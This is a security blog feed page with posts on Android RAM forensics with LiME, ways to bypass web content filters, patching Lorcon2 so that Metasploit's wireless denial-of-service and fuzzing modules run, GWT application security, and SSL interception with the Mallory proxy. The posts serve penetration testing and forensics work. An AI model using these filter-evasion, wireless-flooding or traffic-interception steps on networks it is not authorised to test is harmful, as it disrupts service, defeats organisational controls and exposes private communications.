Quantcast
Channel: Open Security Research
Viewing all 107 articles
Browse latest View live

Acquiring volatile memory from Android based devices with LiME Forensics, Part I

$
0
0
By Ismael Valenzuela.

Up until now, most of the Android forensics research has been focused on areas like the acquisition and analysis of the internal flash NAND memory, SD Cards, understanding the YAFFS2 file system and scrutinizing APK files for malware analysis, among others.

However, little has been written about memory acquisition and analysis of Android devices, one of the most active areas of research in the field of computer forensics. Volatile memory, also referred as RAM, is a critical piece of evidence for every forensic investigator since it contains a wealth of information that is gone as soon as the device is rebooted or turned off (at the end of the day that’s why it’s called volatile, huh).

Several methods allow the extraction of information of running processes in Android. In example, the analyst could use the Android Debug Bridge (adb) to access a shell on the device and run the following commands to dump information about running processes, network connections and other device logs:

<WARNING>
The following examples assume you have installed the Android SDK and other prerequisites as described later in this post. I also assume that you are familiar with the basic operation of these tools and that at least you know how to create and manage an Android Virtual Device and access it using adb.



$ adb shell ps  
$ adb shell netstat
$ adb shell logcat


Figure 1 – Listing running processes on the Android emulator via adb


An alternative method for dumping the contents of memory of a running process involves using the Dalvik Debugging Monitor Server (ddms), a tool that comes with the Android SDK. All you need to do is to select a process and click on the “DUMP HPROF file” button to dump the contents of that process onto disk.


Figure 2 – Dumping the contents of the com.android.email process via ddms

However, none of the methods described above can dump the ‘full contents’ of memory. While they allow you to perform some “live analysis”, it wasn’t possible to obtain a full capture of the device’s RAM in the same fashion that it was possible in Linux with tools like fmem. At least, not until DMD came up.

So it was certainly a glad surprise to read about DMD (now called LiME Forensics) when preparing for my talk at the 1st International Symposium for Android Security held in Malaga last week. If you read Spanish you can find the slides for my talk “Latest Advances in Android Forensicshere.

This tool was first presented by his author, Joe Sylve, earlier this year at Shmoocon 2012 in Washington DC, and it’s the first tool that allows the analyst to capture full contents of RAM from Android devices.

While the tool was announced this week, it was effectively available from google code for almost a month, which allowed me to play with it and demo it for my audience last week. As I mentioned during my talk, the installation of the tool can get ‘tricky’ so I thought I’d better share with you the steps I took to compile it and how to use it.

The first and foremost thing to know before diving into the instructions is that LiME Forensics is a Loadable Kernel Module (LKM), and as such it has to be compiled for the specific kernel of your Android device.

Therefore, in the rest of the post, I will show how you can build a kernel of your own, how to load it onto the emulator and how to cross-compile the LiME LKM so you can test it with your customized kernel.

Though you can find the author’s original installation document here, I found that the instructions didn’t work with the latest versions of the SDK and NDK. Hence, the reason for this post. I hope the following instructions will save you some headaches, severe pain and some valuable time. And if they don’t work for you for some reason, leave a comment, so we can all learn ;)

I have to say that I also exchanged a couple of emails with Joe Sylve trying to figure out what was wrong and I have to say he was very responsive (thanks!).

GETTING READY TO ROCK


The following instructions have been tested successfully on Ubuntu 11.10, with Java SE Development Kit 6 Update 31, the Android SDK r18, NDK r7c and with the emulator running an Android Viritual Device (avd) based on Android 4.0.3 (API 15).

We will start downloading and unzipping the toolchain required to build the Android kernel. Download and untar the following:
You can place them anywhere, but take note of that since you will need to include those directories in your path, as shown later in this post.

To follow the example, I placed mine in the following directories, hanging off my home folder:

~/android-sdk-linux
~/android-ndk-r7c

Next we will get the source code for the Android SDK and other tools to compile those.

There is no need to duplicate what is well documented in the Android Source website, so just follow the instructions of how to setup a Linux build environment that can be found here: http://source.android.com/source/initializing.html

Once you’ve installed all the required packages, including the Java Development Kit, you should install the repo client, as described here: http://source.android.com/source/downloading.html

You must initialize the repo client now. To do so, create an empty directory to hold your files and run repo init from there:

 $ repo init -u https://android.googlesource.com/platform/manifest

This allows your client to access the android source repository, downloading the latest version of Repo with all its most recent bug fixes.

Now pull down the files to your working directory running:

$ repo sync

You must initialize the environment now:

$ source build/envsetup.sh

And choose a target to build with lunch. I selected the default one:

 $ lunch full-eng

BUILDING THE CUSTOM ANDROID KERNEL


You will need to download and untar the kernel source for your device. If you are dealing with a real device go to the website of your device manufacturer. For our test we will use the “goldfish” source code only. Goldfish is the name of the kernel branch for the Android emulator.

$ git clone https://android.googlesource.com/kernel/goldfish.git ~/source/kernel/goldfish/goldfish

Now you have the emulator kernel source inside the ~/source/kernel/goldfish/ directory. Change to the goldfish directory and make sure all the tools and the cross-compilation toolchain is in your path. Below is an excerpt of my .bashrc file with the aliases I defined for this purpose:

export USE_CCACHE=1

export PATH=$PATH:~/android-sdk-linux/tools/
export PATH=$PATH:~/android-sdk-linux/platform-tools/
export ANDROID_SWT=~/android-sdk-linux/tools/lib/x86_64/
export ANDROID_JAVA_HOME=/usr/lib/jvm/jdk1.6.0_31
export JAVA_HOME=/usr/lib/jvm/jdk1.6.0_31
export CCOMPILER=~/android-ndk-r7c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin/arm-linux-androideabi-

Note that the location of these tools (JDK, NDK, etc…) might vary depending on where you placed them in the previous steps.

Before we try compiling the kernel for the emulator we need to get a .config file for the kernel. In order to do that you must retrieve and copy the kernel config from your device. While your device is running and accessible via the Android Debug Bridge, run:

$ cd ~/android-sdk-linux/platform-tools    
$ ./adb pull /proc/config.gz
$ gunzip ./config.gz
$ cp config ~/source/kernel/goldfish/.config

An alternative to this last step would be to run make ARCH=arm goldfish_defconfig from the goldfish kernel source directory.


The next two steps are critical for the success of this exercise, as we will be preparing the kernel source for our module.

First, make sure that the following options are enabled in the kernel config. Check that the .config file contains:

CONFIG_MODULES=y
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y

Otherwise add those lines. These options have to be enabled for the kernel to be able to load and unload modules.

Second, build the kernel using the following command:

$ make ARCH=arm CROSS_COMPILE=$CCOMPILER EXTRA_CFLAGS=-fno-pic modules_prepare

Note that we are using the cross-compilation toolchain provided by the Android NDK with the option CROSS_COMPILE. Obviously, the CCOMPILER variable must be correctly set (see the excerpt of my .bashrc file above). Note that I also had to add the EXTRA_CFLAGS=-fno-pic for make to work with the latest NDK. This is not included in the LiME documentation, but it worked for me.

Your new kernel is now located at arch/arm/boot/zImage

You can now run your brand new kernel using the emulator included with the Android SDK:

$ emulator -avd Demo -kernel ~/source/kernel/goldfish/arch/arm/boot/zImage  -show-kernel –verbose

In this case, Demo is my Android Virtual Device (AVD) which I previously created using the AVD manager. It’s running API 15 (Android 4.0.3).

OBTAINING AND COMPILING LIME


Grab a copy of LiME from here:
http://code.google.com/p/lime-forensics

All you need is lime.c and a Makefile that will prepare the module for cross-compilation.

A sample Makefile is shipped with the LiME source, but I will copy below the one that I created for this purpose:

obj-m := lime.o

KDIR_GOLD := ~/source/kernel/goldfish/

KVER := $(shell uname -r)

PWD := $(shell pwd)
CCPATH := ~/android-ndk-r7c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin

default:
# cross-compile for Android emulator
$(MAKE) ARCH=arm CROSS_COMPILE=$(CCPATH)/arm-linux-androideabi- EXTRA_CFLAGS=-fno-pic -C $(KDIR_GOLD) M=$(PWD) modules
mv lime.ko lime-goldfish.ko

# compile for local system
$(MAKE) -C /lib/modules/$(KVER)/build M=$(PWD) modules
mv lime.ko lime-$(KVER).ko

make tidy

tidy:
rm -f *.o *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d
rm -rf \.tmp_versions

clean:
make tidy
rm -f *.ko

Save and place this Makefile in the directory where you’ve placed the source for LiME. Again, make sure the location of the directories included above corresponds with your install.

Finally (at last!) you are ready to cross-compile the kernel module.

From the directory where you’ve placed lime.c and the Makefile, run:

$ make

If everything went well, you should have a LKM file called lime-goldfish.ko and you deserve a short break with a good cup of before moving on.

In the second part of this post we will look at how to use this Loadable Kernel Module to dump the full contents of RAM of an Android device and what kind of information can be retrieved from this capture.

About the Author


Ismael Valenzuela (GCFA, GREM, GCIA, GCIH, GPEN, GWAPT, GCWN, GCUX, CISSP, CISM, 27001 Lead Auditor & ITIL Certified) works as a Principal Architect at McAfee Foundstone Services EMEA. Find him on twitter at @aboutsecurity or at http://blog.ismaelvalenzuela.com

Circumventing Internet Censorship

$
0
0
By Kunjan Shah.

During my first engagement at Foundstone I tested a web filtering software and we found several ways of bypassing it. With the recent news around SOPA and the controversy around Indian government willing to pre-screen Internet, I thought this might be the right time to write a blog on it. In this blog I have mentioned a few such techniques that can be used to circumvent web filtering software. Although a lot of this information is available on the internet (scattered), I have tried to put together a one-stop list of tried and tested techniques with detailed examples.

The discussion in this blog is limited to tricks and techniques that can be used on the web, and it does not focus on software that can be used for circumvention such as Application tunneling software, Re-routing systems, peer-to-peer software etc. The reason is most of the time users trying to circumvent corporate web filtering do not have administrator privileges to install these tools. If you already have administrator access to your machine then there are easier ways to bypass circumvention than the techniques described below. Some of the widely used tools include Peacefire, TOR, JAP ANON etc. You can find a thorough list of such tools here:

You can also obtain information on what its Censorship and its History here. I will not be covering that in this blog. Circumvention may be considered illegal in some companies/countries and if caught it may result in you getting fired or jailed thus, this blog is only for informational purpose and not an invitation to attempt this.

URL Canonicalization


In this technique we will use alternate domain names and alternative representations of the domain names to bypass filtering. For the purpose of this discussion let’s assume that access to www.facebook.com is blocked and our end goal is to access it from behind the web filtering tool. Depending on how intelligent the filtering tool is one or more of the below mentioned techniques should work. During our assessment we found that some of these techniques worked on the top filtering brands.

Alternative Domains


Instead of http://www.facebook.com you can try the following.
  1. https://www.facebook.com/ (Sometimes HTTPs version of the site is not blocked)
  2. http://Facebook.com
  3. http://Facebook.com/
  4. http://Facebook.com.
  5. http://Login.facebook.com
  6. http://touch.facebook.com
  7. http://M.facebook.com (Access the mobile version of Facebook instead)
  8. http://Apps.facebook.com
  9. http://Register.facebook.com


Alternate Representations


All the browsers do not equally accept the formats mentioned below. However, most of these work with the standard browsers. During our assessment we found that the URL and IP address of the website were blocked. However, when accessing the blocked website using the decimal and octal form it worked fine for us.
  1. Try accessing Facebook using the IP address: http://66.220.147.44
  2. Decimal format of the IP address 66.220.147.44 : http://1121751852
  3. Hexadecimal format of the IP address: http://0xd42dc932c/
  4. Dotted Hexadecimal form: http://0x42.0xdc.0x93.0x2c
  5. Dotted Octal form: http://0102.0334.0223.0054

Below is the list of tools for converting the IP address into different forms:

Translation Services


Translation services such as www.microsofttranslator.com can also be used to circumvent filters. We can do this by translating the blocked website e.g. boingboing.net from English to English. When doing so translation services work similarly to the web proxy sites. During our assessment we found that filtering tools block some common translation sites such as Babelfish. However, we were able to find one that was not blocked (InterTran) and access the blocked website boingboing.net


Some translation services such as translate.google.com prevent translation into the same language, so they may not be very useful depending on your needs. However, there is also a solution to this problem. You can use Google translate to convert a website from English to French and then back to English using the Google chrome’s translation features. Babelfish lets you translate from English to English by selecting “French to English” or any such option that ends in “to English”. Since, there is nothing to translate it just returns back the content in English.


List of other free translation services:


Cached Pages and Mirror Sites


Search engines keep copies of the indexed pages known as Cached pages. Cached pages of the blocked sites can be accessed through special keywords in the search request. During our review we noticed that www.boingboing.net was blocked by the filtering tool. However we could access its cached version through Google cache by searching for “cache:www.boingboing.net”.


We also noticed that we were able to access it by appending “nyud.net:8090” at the end such as www.boingboing.net.nyud.net:8090. URL’s with nyud.net as the domain name are processed by the Coral Content Distribution Network (CCDN). “CCDN is a free peer-peer content distribution network, comprised of a world-wide network of web proxies and name servers.” (http://www.coralcdn.org/)


Moreover old archived pages of the blocked sites can be obtained from www.archive.org or www.bibalex.org.



Low-Bandwidth Simulators


Low-bandwidth simulators such as www.loband.org let us simulate website performance on low bandwidths. This can act as a wrapper allowing us access to the text only version of the blocked sites. This is a good option to access news, blogs, email and other sites, however not a good option for accessing sites with Flash and HTML5 such as YouTube.



Proxy Websites


Proxy website is the easiest and well known way of accessing banned websites. However, the issue is that web filtering systems block most known proxy websites and continue to update their list on a regular basis. But the good news is that proxy sites keep on growing at a faster rate than they are banned. Thus, you will always find some such sites that are not banned. You can obtain a list of regularly updated proxy servers here. You can also join a proxy mailing list like Circumventor. If you are using proxy servers to access banned sites such as Facebook, be cautious about the information you provide such as credentials. A lot of this information may be cached on the proxy servers and get leaked or misused by the admins.



Web to email


It is possible to obtain blocked web pages and search the web for information via email by sending simple commands [FTP] . Here is the list of some popular sites:

A complete list of all such sites and commands can be found here. To obtain a blocked web pages in email send an email to www@web2mail.com with the address of the website as the subject.




In addition to this, you can also subscribe to receive daily updates of a website in email. This is a good method for obtaining information from blocked news and blog sites. There are other websites that provide similar services such as www.changedetection.com and www.watchthatpage.com. Every time a web page changes an email alert is sent to the user.



Web to PDF


Similarly you can also convert web pages to PDFs and download them or email them without getting blocked. None of the web filtering software that we tested caught this.


Websites providing free web to PDF conversion services:


RSS Aggregators


RSS Aggregators are websites or desktop applications that let you subscribe to and read RSS (Really Simple Syndication) Feeds. During our review we found that the filtering software did not block access to RSS aggregators such as Google Reader, Bloglines and Fastladder etc. This makes it possible for the user to read blogs from the restricted web sites like BoingBoing by pointing such RSS readers to listen to the RSS feeds. However, this technique is limited to sites that publish RSS feeds.



Google Add-ons


During our assessment we noticed that it was possible to access some of the blocked sites via Google gadgets. Just add gadgets for the blocked sites such as Facebook, Twitter and YouTube etc. to iGoogle and access the blocked content. Some smart web filtering systems may prevent one or more such gadgets, but not all of them. Similarly you can also use Yahoo widgets.



Non-Standard Web Browsers


Another technique is to use non-standard browsers for accessing blocked sites. Some examples include:

Accessing Blocked Instant Messengers


There are several free websites that let you access blocked instant messengers online over the web. Here is a list of few such sites:


Enjoy!

Installing Lorcon2 on Backtrack 5 R2

$
0
0
Robert Portvliet

Recently I wanted to play around with some of the wireless dos and fuzzing tools in Metasploit, which requires the installation of Lorcon2. I found this to be a bit of an adventure so I figured I would write up a quick blog post for those who may encounter the same issues in the future.

So, the Metasploit documentation states to install Lorcon2 as follows:
 $ sudo bash  
# cd /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install

This sort of worked - when I ran the ./configure, I noticed a bunch of strange warnings about if_arp.h, and wireless.h:


A quick dive into the autoconf documentation (http://www.gnu.org/software/autoconf/manual/autoconf.html#Present-But-Cannot-Be-Compiled) yields:

20.7 Header Present But Cannot Be Compiled

The most important guideline to bear in mind when checking for features is to mimic as much as possible the intended use. Unfortunately, old versions of AC_CHECK_HEADER and AC_CHECK_HEADERS failed to follow this idea, and called the preprocessor, instead of the compiler, to check for headers. As a result, incompatibilities between headers went unnoticed during configuration, and maintainers finally had to deal with this issue elsewhere.

The transition began with Autoconf 2.56. As of Autoconf 2.64 both checks are performed, and configure complains loudly if the compiler and the preprocessor do not agree. However, only the compiler result is considered.

Ok, so those warnings weren't really that bad.

libnl-dev

There is still the missing libnl library warning. Installing the libnl-dev package fixed those:

 apt-get install libnl-dev 

Troubleshooting test.rb

With the ruby all set up and installed, its time to run the test.rb script provided in the /opt/metasploit3/msf3/external/ruby-lorcon2/. You'll notice if you try to run it, you're going to get this error:

To make a long story short, after a fair bit of searching I found a very helpful post at http://www.secgeeks.com/fix_for_lorcon2_ruby_1_9_2.html which stated the following:
Faced a minor problem with Lorcon2 wrapper module, in compiling with ruby 1.9.2. Following will fix the issues for those who are facing it:
Change STRCCSTR function in file ruby-lorcon-1.0.0/Lorcon.c at line 443,441:

 driver = STR2CSTR(rbdriver);

intf = STR2CSTR(rbintf);

to:

 driver = StringValuePtr(rbdriver);

intf = StringValuePtr(rbintf);

Hope it helps.
Yes it did Secgeek, thanks very much! However, in the case of Lorcon2, you have to edit three lines instead of two:


Change all three “STR2CTR” on these three lines to “StringValuePtr”. When you are done it should look like this:

After that, running ‘ruby test.rb’ gives us the desired output.



Couple More Ruby Issues

Ok, so let’s test one of the Metasploit modules that use Lorcon2 to see if it works.


No dice…
A bit more searching led me to a closed bug report at http://redmine.backtrack-linux.org:8080/issues/153 which stated the following:

Solution: they should be compiled with ruby 1.9.1 and placed in /opt/framework3/ruby/lib/ruby/site_ruby/1.9.1/i686-linux
  1. install ruby1.9.1
  2. cd to /opt/framework3/msf/external/ruby-lorcon2
  3. ruby1.9.1 extconf.rb
  4. make
  5. copy Lorcon2.so to the directory specified above.
  6. do the same for /opt/framework3/msf/external/pcaprub
  7. copy liborcon* files from /usr/local/lib to /opt/framework3/lib replacing existing files

Following these instructions, I copied the liborcon* files , which were in /usr/lib in my case, to /opt/metasploit/msf3/lib/, and copied Lorcon2.so from /opt/metasploit/msf3/external/ruby-lorcon2 to /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/i686-linux/.

Its working! (not completely)

Fired up Metasploit again….. Nice!


Kismet confirms its working.


Then I tried ssidlist_beacon.rb:


Not so nice…. WTF?
When I cracked it open I saw that while all the other wireless modules use Lorcon2, it references Lorcon in the ‘includes’ section. So, I tried changing it to Lorcon2. I fired up Metasploit again:


Better… different error, now it complains about an undefined method ‘channel’. After taking a look at the other wireless modules, I found two others, netgear_ma521_rates.rb , and netgear_wg311pci.rb that did not work either, and gave the same error. They all also used the same syntax to determine the channel

 "\x03" + "\x01" +
channel.chr

While the FakeAP.rb module, which works, uses the following:

 "\x03" + "\x01" +
datastore['CHANNEL'].to_i.chr

Using that to replace the previous line fixed the problem.

It works! (for real now)



All kinds of SSID’s in the air now :)


The channel issue seemed to affect the following modules, I received the same error from all of them and when I replaced that line as described above, they all appeared to work properly.


auxiliary/dos/wifi/netgear_ma521_rates NetGear MA521 Wireless Driver
Long Rates Overflow

auxiliary/dos/wifi/netgear_wg311pci NetGear WG311v1 Wireless
Driver Long SSID Overflow

auxiliary/dos/wifi/ssidlist_beacon Wireless
Beacon SSID Emulator

auxiliary/fuzzers/wifi/fuzz_beacon Wireless Beacon Frame
Fuzzer auxiliary/fuzzers/wifi/fuzz_proberesp Wireless Probe Response Frame Fuzzer

When running the auxiliary/fuzzers/wifi/fuzz_beacon module, beacons appear to be fuzzing properly :)


As does auxiliary/fuzzers/wifi/fuzz_proberesp:


I wrote a quick bash script to correct these issues and install Lorcon2. I ran it through a few times and all seemed well, but let me know if you expererience any issues.

 #!/bin/bash

# Script to install Lorcon2 on Backtrack 5 R2
# By Robert Portvliet
# Foundstone

# Set up variables
msfwifi_dir="/opt/metasploit/msf3/modules/auxiliary/dos/wifi/"
rubylorcon_dir="/opt/metasploit/msf3/external/ruby-lorcon2/"
msfuzz_dir="/opt/metasploit/msf3/modules/auxiliary/fuzzers/wifi/"

echo "[*] This script will install Lorcon2 on Backtrack 5 R2"

echo "[*] Install libnl netlink library"
apt-get install libnl-dev

echo "[*] Downloading Lorcon2 from SVN"
svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2

echo "[*] Copying Lorcon2 to MSF"
cp -r ./lorcon2 $rubylorcon_dir

echo "[*] Fixing MSF wireless modules"
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfwifi_dir/ssidlist_beacon.rb
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfwifi_dir/netgear_*
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfuzz_dir/*.rb
sed -i 's/Lorcon/Lorcon2/g' $msfwifi_dir/ssidlist_beacon.rb

echo "[*] Fixing Ruby-Lorcon2 before building"
sed -i 's/STR2CSTR/StringValuePtr/g' $rubylorcon_dir/Lorcon2.c

echo "[*] Building Lorcon2"
cd $rubylorcon_dir/lorcon2
./configure --prefix=/usr && make && make install

cd ..

echo "[*] Building Ruby-Lorcon2"
ruby ./extconf.rb && make && make install

echo "[*] Copying Lorcon2 libraries into Metasploit"
cp $rubylorcon_dir/Lorcon2.so /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/i686-linux/
cp /usr/lib/liborcon2* /opt/metasploit/msf3/lib/

echo "[*] Finished, fire up a wireless module and see if it works"



A Quick Overview of Google Web Toolkit Application Security

$
0
0
By Vijay Agarwal.

One of my recent engagements I had got an opportunity to work on a application which uses Google’s Web Toolkit (GWT). GWT is open source java framework used to create rich internet applications. Both the server and the front end are written in java and all the front end logic is compiled client side into obfuscated JavaScript equivalents and loaded into the browser.

Boot Strap Loading and cache/no cache Files


GWT requires no special browser plug-ins and has minimal cross browser headaches. Typically whenever an application loads, its bootstrap process is kicked off and starts the application initiation process. On the server side, the gwt.js and .nocache.js files handle the bootstrap process and are responsible for performing the deferred binding which loads the configuration, modules, and browser specific classes. During this time, initial configuration steps like browser detection takes place and compatible java scripts files are created which are supported by the browser.

The above processes results in multiple "[MD5 Sum].cache.html" files. These are browser specific files that contain application logic, and are generated post authentication. They are named according to the MD5 sum of their contents and consist of RPC methods, other restricted methods, and sensitive information.

Example cache file names:
  • https://www.xyz.com/testapp/9E871855826913D91F95F8F65F4ED9E3.cache.html
  • https://www.xyz.com/testapp/C2C2D9E9AB0BBFD8B66FD43702FAF3B5.cache.html

Example file content:
 functionjy(b,c,d,e,f){[..snip..]  
!!$stats&&$stats({moduleName:$moduleName,sessionId:$sessionId,subSystem:TG,evtGroup:j,method:oI,millis:(new Date).getTime(),type:WH});
k=vr(b);try{lr(k.b,oF+Oq(k,pI)); lr(k.b,oF+Oq(k,qI)); lr(k.b,ZH);lr(k.b,oF+Oq(k,$H));lr(k.b,oF+Oq(k,$H));
lr(k.b,oF+Oq(k,rI));lr(k.b,oF+Oq(k,c));lr(k.b,oF+Oq(k,d));lr(k.b,oF+e);i=jr(k);[..snip..]wr(b,(cs(),oI),j,i,f)

Since these cache files are generated once the user logs out of the application, these files should be restricted and should not be accessible without authentication on the server side. If accessible, these files may disclose sensitive information.

Client Side Code


Google obfuscates it's code once it reaches the client's browser as an extra layer of security and, presumably, to save disk space. The client side code can potentially contain application data and all of the of components associated with it's inner workings, things like its RPC framework - which can greatly aid an attacker. Google uses all of the common obfuscation methods such as function, variable renaming, reordering and respacing

Authorization and other Issues


Authorization issues seem to come up quiet a bit with GWT based applications since its often adopted by developers who focus more on interface design, rather then security. Because of this all of the major web application vulnerabilities should not be forgotten, particularly those associated with authorization vulnerabilities such as forced browsing, session replay, and parameter manipulation.

References

Mallory MITM + FIX SSL Decryption

$
0
0
by Paul Ambrosini.

Recently, I was faced with testing a Java-based thick client that communicates using the “Financial Information eXchange”protocol, also known as “FIX”. (The protocol is documented here: http://fixprotocol.org/). FIX is “a messaging standard developed specifically for the real-time electronic exchange of securities transactions”. Most thick clients these days use Web-based services and in doing so use some variant of HTTP (or, if not that, plaintext XML interchange), but FIX is different.

In this post I’ll cover how I approached testing this protocol and the tools I used to test it. I won’t be discussing the FIX protocol in much detail beyond what can be found on the FIX site or various FIX wikis on the net. This post will focus primarily on how to set up and configure Mallory to decrypt the SSL stream from a FIX-speaking thick client.

To start my testing I was given a thick client (the app itself out-of-scope- it’s a developer testing harness). The client was written in Java and had lots of configuration options that later proved useful for testing. This thick client quickly introduced certain limitations to testing, however:
  1. The client itself is out-of-scope, so only findings that apply to the API can be reported;
  2. The thick client is using the FIX protocol over TCP; and
  3. The TCP Stream is SSL encrypted.


I quickly realized that a normal proxy (Fiddler or Burp, for example) was going to be of very limited help. The first suggestion I got was Charles Proxy, which can handle generic TCP/SSL connections. After doing some reading on the FIX API, though, I decided to go with Mallory, since I can write python code to tie in with Mallory and assist my testing.

Information on Mallory can be found here: https://bitbucket.org/IntrepidusGroup/mallory/wiki/Home

The install guide can be found here: https://bitbucket.org/IntrepidusGroup/mallory/wiki/Installation

Note: I originally used the Mallory VM from the torrent; however, at the time of writing, no one was seeding the torrent. For that reason, I based this guide off of a fresh Ubuntu install.

Mallory Initial Setup



I installed Ubuntu 11.04 (Natty Narwhal) Desktop onto a VM with:
  • 3 Network Interface Cards with each set to Bridged
  • 1024 MB of RAM
  • 10 GB of hard disk space
  • A user named “mallory”


Note: These specifications were for the way I was going to setup my network, make sure to decide how you will route traffic in your case.

The first step is getting Mallory installed. We’ll need a shell (for example, xterm,konsole, or gnome-terminal) and internet access to the VM. The network setup for this VM will use one interface as a gateway interface (eth0), one interface as an outgoing interface (eth1) and one interface as a DNS listener (eth2). Upon first boot all three NICs have DHCP and they need to be disabled for internet connectivity.

Commands:

 $ sudo ifconfig eth0 down  
$ sudo ifconfig eth2 down
$ ping 8.8.8.8 #test the connection



Figure 1: Turning off two interfaces and testing the connection with ping.


Now that the internet connection works we download the Mallory install script and run it.

 $ wget https://bitbucket.org/IntrepidusGroup/mallory/downloads/mallory_install.sh
$ chmod +x mallory_install.sh
$ sudo ./mallory_install.sh
$ sudo ./mallory_install.sh
**a lot of text later (go grab some tea/coffee)**
/home/mallory/mallory #folder to place mallory in
*hit enter for yes*
$ cd /home/mallory/mallory/current/src/



Figure 2: Downloading and running the Mallory install script.



Figure 3: Finishing the install script and changing into the new directory.


Once installation is complete and we’re in the Mallory directory, we need to get our network set up correctly.

Routing Traffic

How you use Mallory will be determined by how you route traffic. Mallory can handle all sorts of situations, but for my purposes, setup is fairly simple. I’m going to use my Mallory VM as a network gateway and route traffic from my testing VM through Mallory. Because I am completely controlling my test environment, I don’t need to do any extra ARP poisoning or PPTP setup. This setup has the additional benefit that, once the VM is properly configured, it can easily be “turned on” or “turned off” just by changing a host’s routing tables.

My network setup will use eth0 as the MITM interface and eth2 as the DNS listener interface, so each of these interfaces will need to be up and configured with static IP addresses. eth1 will be the Mallory VM’s connection to the Internet and get a DHCP address. Because we are using Ubuntu we can edit the file /etc/network/interfaces which will persist the settings across reboots.

# First
allow manual interface configuration
$ sudo service network-manager stop
$ sudo killall –w dhclient



Figure 4: Stopping the network manager service and any dhclient processes.


Now open /etc/network/interfaces with your favorite editor. Static IPs on eth0 (MITM) and eth2 (DNS listener) then DHCP on eth1:

$ sudo vi /etc/network/interfaces



Figure 5: Configuration settings for /etc/network/interfaces.


$ sudo ifup eth0
$ sudo ifup eth0
$ sudo ifup eth2
$ ifconfig # Check the configuration



Figure 6: Turning on the interfaces with "ifup" and checking their settings with "ifconfig".

Install and start dnsmasq on eth2 to act as a DNS request forwarder:

$ sudo apt-get install dnsmasq
$ sudo /etc/init.d/dnsmasq stop
$ sudo /etc/init.d/dnsmasq start -i eth2



Figure 7: Install dnsmasq with apt-get then stop and start the daemon on eth2.


Note: Because we are using Ubuntu, we need to stop the Network Manager service and kill all the dhclient processes. Otherwise, our static addresses will get mysteriously wiped out every few minutes. On a system used for other purposes, this might have adverse consequences.

To make sure everything is working fine, ping 8.8.8.8 and check for connectivity. If you can’t ping out for some reason just do:

$ sudo ifdown eth1
$ sudo killall -w dhclient
$ sudo ifup eth1


…then try to ping again.

Now, because we are controlling the environment, we need to configure our testing VM to route through the gateway. On Windows, configure the IP addressing like so:


Figure 8: Windows network configuration for testing VM


On a Linux system, the following commands produce the same configuration state (commands to kill dhclient and/or network-manager not included):

 $ sudo ifconfig eth0 inet 10.0.0.2 netmask 255.255.255.0
$ sudo route add default gw 10.0.0.1
$ echo “nameserver 10.0.0.3” | sudo tee /etc/resolv.conf


Intercepting Traffic


The next step is to actually start Mallory and confirm that we can capture encrypted traffic. Open two command prompts on the Mallory VM, change to the Mallory directory in each of them, and start Mallory; one in the GUI mode, one in worker mode.

Terminal 1, Worker Mode:


$ cd /home/mallory/mallory/current/src
$sudo python mallory.py



Figure 9: Starting mallory.py for the first time.


Terminal 2, GUI Mode:


$ cd /home/mallory/mallory/current/src
$ sudo python launchgui.py



Figure 10: Executing the launchgui.py script and the GUI started.


After launching the GUI from the command line, the GUI itself should be displayed. Using this interface, configure the interfaces used by Mallory by clicking the checkbox for “Perform MiTM” on the eth0 interface and “Outbound Interface” for the eth1 interface, then click Apply Configuration at the bottom. Terminal 2 – where we launched the GUI – will show some iptables rules get applied.


Figure 11: Start the MiTM and outbound interfaces settings.


In the Protocols tab on the GUI, find the line in Protocol Configuration that looks like:

;http_1:http.HTTP:80


Mallory uses the semi-colon as the comment character. Since we want to enable capture on this protocol, remove the leading ‘;’ so that the line looks like:

http_1:http.HTTP:80


Each line consists of three fields, colon-separated. The first field (“http_1”) is a user-friendly name for the traffic type; we can set this to anything we want. The second field (“http.HTTP”) instructs Mallory how to decode the traffic and correlates to the python code. The third field (“80”) tells Mallory which TCP port it should intercept. Click ‘apply’ to save the changes. You will also see a debug message in Terminal 1 to show HTTP is enabled.


Figure 12: Apply the HTTP protocol MiTM.


For initial testing, only the Interface and Protocol tabs need to be edited. The other tabs will come into play a little later.

To make sure that we’re properly intercepting traffic, switch to the testing VM and open a web browser. Browse to a website normally (such as http://www.google.com) and, if traffic is routing correctly, you should see the images flipped and inverted like in the image below.


Figure 13: www.google.com, with the doodle flipped and inverted by Mallory.


Additionally, every request intercepted by Mallory should generate a DEBUG message in Terminal 1. Look for messages beginning with ‘DEBUG:HTTP’.

Decrypting SSL Traffic

Mallory’s interception of different protocol types is configured by changing the configuration lines in the Protocols tab. First, turn HTTP capture back off by commenting out the line in the protocol configuration tab:

;http_1:http.HTTP:80


Then configure Mallory to perform SSL Man-in-the-Middle, which is what we need for this application. Uncomment (or add) a line instructing Mallory to intercept SSL communications on port 443:

ssl:sslproto.SSLProtocol:443


Click Apply at the bottom. The mallory.py window will print out a debug message reporting that the SSLProtocol module is starting:


Figure 14: Starting SSL MiTM in Mallory.


At the time of writing, the ‘Configured Protocols’ section of the Protocols tab states that SSL Base is not debuggable; this is actually a bug in Mallory. A fix is available, but for our purposes, this is mainly an aesthetic issue. (https://groups.google.com/forum/#!topic/mallory-proxy/PF2MwXOpcEg)

Next, visit Rules tab and locate the “DebugAll”rule. The Rules tab allows the user to choose which messages to show in the Streams tab. Some of the options are server-to-client, client-to-server, both, port etc. Inspect the options that are set in the “Debug All” rule. No changes from the defaults are needed, so ensure that the rule matches the screenshot below, and hit Save Rule.


Figure 15: Starting the "Debug All" rule.


Switch over to the Streams tab and, to start intercepting traffic, click the ‘Intercept’ and ‘Auto Send’ button. Later on, if we need to do interactive manipulation, we’ll turn Auto Send off; but keep it on right now for testing purposes.

